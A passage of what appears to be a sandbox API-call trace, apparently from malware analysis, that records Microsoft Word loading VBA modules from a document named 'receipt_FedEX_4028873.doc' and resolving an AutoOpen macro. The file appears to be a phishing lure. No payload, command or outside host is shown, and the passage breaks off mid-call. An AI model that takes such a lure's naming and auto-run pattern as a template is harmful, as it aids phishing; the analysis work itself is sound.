ppvObject=0x187688 | out: ppvObject=0x187688*=0x0) returned 0x80004002 [0041.269] GetLocalTime (in: lpSystemTime=0x187530 | out: lpSystemTime=0x187530*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x2f8)) [0041.270] wcsncpy_s (in: _Destination=0x1871e0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0041.270] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0041.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x187110, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0041.270] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0041.270] GetLocalTime (in: lpSystemTime=0x1873d0 | out: lpSystemTime=0x1873d0*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x2f8)) [0041.270] wcsncpy_s (in: _Destination=0x187080, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0041.270] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", cchLength=0x36 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc") returned 0x36 [0041.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", cchWideChar=55, lpMultiByteStr=0x186fb0, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", lpUsedDefaultChar=0x0) returned 55 [0041.270] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -4 [0041.270] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0 [0041.270] IUnknown:QueryInterface (in: This=0x6992580, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1875b8 | out: ppvObject=0x1875b8*=0x0) returned 0x80004002 [0041.270] ITypeLib:RemoteGetLibAttr (in: This=0x6992580, ppTLibAttr=0x1875b0, pDummy=0x10 | out: ppTLibAttr=0x1875b0, pDummy=0x10) returned 0x0 [0041.270] ITypeLib:RemoteGetDocumentation (in: This=0x6992580, index=-1, refPtrFlags=0x0, pbstrName=0x1875a8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x100000000 | out: pbstrName=0x1875a8*="Microsoft Office 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x100000000) returned 0x0 [0041.270] StringFromGUID2 (in: rguid=0x68f12f0*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52)), lpsz=0x1875d0, cchMax=39 | out: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 39 [0041.270] _ultow_s (in: _Value=0x2, _Buffer=0x18751a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0041.270] _ultow_s (in: _Value=0x8, _Buffer=0x18751e, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0041.270] _ultow_s (in: _Value=0x0, _Buffer=0x187522, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0041.270] wcscpy_s (in: _Destination=0x6a97938, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0041.270] wcscpy_s (in: _Destination=0x6a9793e, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0041.270] wcscpy_s (in: _Destination=0x6a9798a, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0041.270] wcscpy_s (in: _Destination=0x6a97998, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0041.270] wcscpy_s (in: _Destination=0x6a97a18, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0041.270] ITypeLib:LocalReleaseTLibAttr (This=0x6992580) returned 0x0 [0041.270] wcscpy_s (in: _Destination=0x6c8b9b8, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0041.270] ITypeLib:RemoteGetDocumentation (in: This=0x6992580, index=-1, refPtrFlags=0x1876c8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1) returned 0x0 [0041.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0041.270] strcpy_s (in: _Dst=0x1874c0, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0041.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1874c0, cbMultiByte=7, lpWideCharStr=0x187310, cchWideChar=7 | out: lpWideCharStr="Office") returned 7 [0041.270] IUnknown:AddRef (This=0x6990960) returned 0x4 [0041.271] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="Office", lHashVal=0x107515, pfName=0x1873e0, pBstrLibName=0x187310 | out: pfName=0x1873e0*=0, pBstrLibName=0x187310) returned 0x0 [0041.271] IUnknown:Release (This=0x6990960) returned 0x3 [0041.271] IUnknown:AddRef (This=0x6992850) returned 0x8 [0041.271] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="Office", lHashVal=0x107515, pfName=0x1873e0, pBstrLibName=0x187310 | out: pfName=0x1873e0*=0, pBstrLibName=0x187310) returned 0x0 [0041.271] IUnknown:Release (This=0x6992850) returned 0x7 [0041.271] IUnknown:AddRef (This=0x6992df0) returned 0x5 [0041.271] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="Office", lHashVal=0x107515, pfName=0x1873e0, pBstrLibName=0x187310 | out: pfName=0x1873e0*=0, pBstrLibName=0x187310) returned 0x0 [0041.271] IUnknown:Release (This=0x6992df0) returned 0x4 [0041.271] IMalloc:Alloc (This=0x7feffc15380, cb=0x3c) returned 0x6b85180 [0041.271] IMalloc:Free (This=0x7feffc15380, pv=0x6c69f50) [0041.271] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9340 [0041.271] IMalloc:Realloc (This=0x7feffc15380, pv=0x68e9340, cb=0x68) returned 0x6c69f50 [0041.271] IMalloc:Free (This=0x7feffc15380, pv=0x6b85180) [0041.271] wcsncpy_s (in: _Destination=0x1872c0, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0041.271] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x94 [0041.271] IMalloc:Alloc (This=0x7feffc15380, cb=0x12a) returned 0x6a70900 [0041.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=149, lpMultiByteStr=0x6a70900, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 149 [0041.271] IMalloc:Free (This=0x7feffc15380, pv=0x6a70900) [0041.271] IMalloc:Realloc (This=0x7feffc15380, pv=0x6bd33b0, cb=0x1100) returned 0x6c9a9e0 [0041.271] wcscpy_s (in: _Destination=0x6c9b160, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0041.271] wcsncpy_s (in: _Destination=0x187300, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0041.271] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x94 [0041.271] IMalloc:Alloc (This=0x7feffc15380, cb=0x12a) returned 0x6a70900 [0041.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=149, lpMultiByteStr=0x6a70900, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 149 [0041.271] IMalloc:Free (This=0x7feffc15380, pv=0x6a70900) [0041.271] wcsncpy_s (in: _Destination=0x1872c0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0041.271] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0041.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x1871f0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0041.271] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0041.271] IUnknown:AddRef (This=0x6992580) returned 0x4 [0041.271] IUnknown:QueryInterface (in: This=0x6992580, riid=0x7fee45d85a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1876e8 | out: ppvObject=0x1876e8*=0x0) returned 0x80004002 [0041.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x1876b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0041.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0041.272] IUnknown:Release (This=0x6992580) returned 0x3 [0041.272] IUnknown:Release (This=0x6992580) returned 0x2 [0041.272] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0041.272] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=7, lpWideCharStr=0x68f0158, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0041.272] IMalloc:Alloc (This=0x7feffc15380, cb=0xa8) returned 0x6c29a60 [0041.272] IMalloc:Alloc (This=0x7feffc15380, cb=0x7f40) returned 0x6c9baf0 [0041.272] IMalloc:Alloc (This=0x7feffc15380, cb=0x30) returned 0x6889330 [0041.273] IMalloc:Alloc (This=0x7feffc15380, cb=0x60) returned 0x6c6a030 [0041.273] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a861c0, ppTypeAttr=0x1879d8, pDummy=0x69d77b0 | out: ppTypeAttr=0x1879d8, pDummy=0x69d77b0*=0x7) returned 0x0 [0041.273] ITypeInfo:LocalReleaseTypeAttr (This=0x6a861c0) returned 0x0 [0041.273] IUnknown:Release (This=0x6a861c0) returned 0x1 [0041.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x187960, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0041.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.275] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.275] IMalloc:Alloc (This=0x7feffc15380, cb=0x18) returned 0x6c328f0 [0041.275] qsort (in: _Base=0x6c328f0, _NumOfElements=0x3, _SizeOfElements=0x8, _PtFuncCompare=0x7fee426219c | out: _Base=0x6c328f0) [0041.275] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="UserForm1", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 3 [0041.275] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module1", cchCount1=-1, lpString2="UserForm1", cchCount2=-1) returned 1 [0041.275] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module1", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0041.275] bsearch (_Key=0x186898, _Base=0x6c328f0, _NumOfElements=0x3, _SizeOfElements=0x8, _PtFuncCompare=0x7fee426219c) returned 0x6c328f8 [0041.275] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ThisDocument", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 2 [0041.276] IUnknown:AddRef (This=0x6990960) returned 0x4 [0041.276] ITypeLib:RemoteGetDocumentation (in: This=0x6990960, index=-1, refPtrFlags=0x187978, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x187701 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x187701*=0x0) returned 0x0 [0041.276] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="VBA", cchCount1=3, lpString2="Normal", cchCount2=6) returned 3 [0041.276] IUnknown:Release (This=0x6990960) returned 0x3 [0041.276] IUnknown:AddRef (This=0x6992850) returned 0x8 [0041.276] ITypeLib:RemoteGetDocumentation (in: This=0x6992850, index=-1, refPtrFlags=0x187978, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x187701 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x187701*=0x0) returned 0x0 [0041.276] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Word", cchCount1=4, lpString2="Normal", cchCount2=6) returned 3 [0041.276] IUnknown:Release (This=0x6992850) returned 0x7 [0041.276] IUnknown:AddRef (This=0x6992df0) returned 0x5 [0041.276] ITypeLib:RemoteGetDocumentation (in: This=0x6992df0, index=-1, refPtrFlags=0x187978, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x187701 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x187701*=0x0) returned 0x0 [0041.276] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="stdole", cchCount1=6, lpString2="Normal", cchCount2=6) returned 3 [0041.276] IUnknown:Release (This=0x6992df0) returned 0x4 [0041.276] wcscpy_s (in: _Destination=0x68e9348, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0041.276] wcsncpy_s (in: _Destination=0x187290, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0041.276] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0041.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x1871c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0041.276] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0041.276] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0041.276] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=7, lpWideCharStr=0x68f0158, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0041.276] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Normal", cchCount1=6, lpString2="Normal", cchCount2=6) returned 2 [0041.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x1878d0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0041.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.278] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187480 | out: ppvObject=0x187480*=0x0) returned 0x80004002 [0041.278] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187450 | out: ppvObject=0x187450*=0x0) returned 0x80004002 [0041.278] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187440 | out: ppvObject=0x187440*=0x0) returned 0x80004002 [0041.278] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187448 | out: ppvObject=0x187448*=0x0) returned 0x80004002 [0041.278] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a861c0, ppTypeAttr=0x187478, pDummy=0x10 | out: ppTypeAttr=0x187478, pDummy=0x10) returned 0x0 [0041.278] ITypeInfo:LocalReleaseTypeAttr (This=0x6a861c0) returned 0x0 [0041.278] IUnknown:AddRef (This=0x6a861c0) returned 0x3 [0041.278] IUnknown:Release (This=0x6a861c0) returned 0x2 [0041.278] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b9f160, cb=0x100) returned 0x6ba42e0 [0041.278] IMalloc:Free (This=0x7feffc15380, pv=0x6879030) [0041.280] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0041.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0041.280] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0041.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=8, lpWideCharStr=0x68f0158, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0041.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Receipt_FedEX_4028873", cchWideChar=-1, lpMultiByteStr=0x274b7e0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Receipt_FedEX_4028873", lpUsedDefaultChar=0x0) returned 22 [0041.280] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0041.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0041.280] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0041.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68e9348, cbMultiByte=8, lpWideCharStr=0x68f12f8, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0041.280] lstrlenA (lpString="Project") returned 7 [0041.280] lstrcatA (in: lpString1="Project", lpString2=" (" | out: lpString1="Project (") returned="Project (" [0041.280] strncat_s (in: _Destination="Project (", _SizeInBytes=0x187, _Source="Receipt_FedEX_4028873", _MaxCount=0x28 | out: _Destination="Project (Receipt_FedEX_4028873") returned 0x0 [0041.280] lstrcatA (in: lpString1="Project (Receipt_FedEX_4028873", lpString2=")" | out: lpString1="Project (Receipt_FedEX_4028873)") returned="Project (Receipt_FedEX_4028873)" [0041.280] IMalloc:Alloc (This=0x7feffc15380, cb=0xa8) returned 0x6c29bc0 [0041.280] IMalloc:Alloc (This=0x7feffc15380, cb=0x30) returned 0x6879030 [0041.280] IMalloc:Alloc (This=0x7feffc15380, cb=0x60) returned 0x6c6a110 [0041.281] IMalloc:Alloc (This=0x7feffc15380, cb=0xa8) returned 0x6c29c70 [0041.281] IMalloc:Alloc (This=0x7feffc15380, cb=0x30) returned 0x6889530 [0041.281] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a861c0, ppTypeAttr=0x187868, pDummy=0x69d77b0 | out: ppTypeAttr=0x187868, pDummy=0x69d77b0*=0x7) returned 0x0 [0041.281] ITypeInfo:LocalReleaseTypeAttr (This=0x6a861c0) returned 0x0 [0041.282] IUnknown:Release (This=0x6a861c0) returned 0x2 [0041.282] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a861c0, ppTypeAttr=0x187aa8, pDummy=0x69d64c0 | out: ppTypeAttr=0x187aa8, pDummy=0x69d64c0*=0x17) returned 0x0 [0041.282] ITypeInfo:LocalReleaseTypeAttr (This=0x6a861c0) returned 0x0 [0041.282] IUnknown:Release (This=0x6a861c0) returned 0x2 [0041.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="UserForm1", cchWideChar=10, lpMultiByteStr=0x187900, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserForm1", lpUsedDefaultChar=0x0) returned 10 [0041.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.282] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.282] bsearch (_Key=0x186838, _Base=0x6c328f0, _NumOfElements=0x3, _SizeOfElements=0x8, _PtFuncCompare=0x7fee426219c) returned 0x6c32900 [0041.282] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="UserForm1", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 3 [0041.282] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="UserForm1", cchCount1=-1, lpString2="UserForm1", cchCount2=-1) returned 2 [0041.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x187900, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0041.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0041.282] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Module1") returned 0x101162 [0041.282] bsearch (_Key=0x186838, _Base=0x6c328f0, _NumOfElements=0x3, _SizeOfElements=0x8, _PtFuncCompare=0x7fee426219c) returned 0x6c328f0 [0041.282] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module1", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0041.282] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module1", cchCount1=-1, lpString2="Module1", cchCount2=-1) returned 2 [0041.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project.ThisDocument.Autoopen", cchWideChar=-1, lpMultiByteStr=0x187bf0, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project.ThisDocument.Autoopen", lpUsedDefaultChar=0x0) returned 30 [0041.289] IMalloc:Alloc (This=0x7feffc15380, cb=0x1f) returned 0x68e93a0 [0041.289] strncpy_s (in: _Dst=0x68e93a0, _DstSize=0x1f, _Src="Project.ThisDocument.Autoopen", _MaxCount=0x1d | out: _Dst="Project.ThisDocument.Autoopen") returned 0x0 [0041.289] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Project") returned 0x10ae2d [0041.290] bsearch (_Key=0x186af8, _Base=0x6c328f0, _NumOfElements=0x3, _SizeOfElements=0x8, _PtFuncCompare=0x7fee426219c) returned 0x0 [0041.290] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Project", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0041.290] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Project", cchCount1=-1, lpString2="Module1", cchCount2=-1) returned 3 [0041.290] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Project", cchCount1=-1, lpString2="Project", cchCount2=-1) returned 2 [0041.290] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.290] bsearch 